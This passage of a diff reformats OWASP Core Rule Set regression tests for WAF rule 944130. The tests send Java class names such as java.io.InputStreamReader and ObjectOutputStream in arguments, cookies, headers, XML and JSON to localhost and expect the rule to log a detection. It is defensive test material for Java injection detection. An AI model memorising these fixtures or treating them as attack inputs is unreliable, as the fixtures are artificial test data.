\"944130\"" + - test_id: 152 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_id: 153 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 154 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 155 desc: "Argument test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_id: 156 desc: "Argument name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 157 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" 
- data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 158 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStreamReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 159 desc: "Request header test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 160 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 161 desc: "XML element value includes keyword 
java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_id: 162 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_id: 163 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_id: 164 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStreamReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 165 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStreamReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 166 desc: "Argument test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-167 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_id: 167 desc: "Argument name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 168 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 169 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.LineNumberReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 170 desc: "Request header test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 171 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + 
output: + log_contains: "id \"944130\"" + - test_id: 172 desc: "XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_id: 173 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_id: 174 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_id: 175 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.LineNumberReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 176 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.LineNumberReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 177 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 178 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 179 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
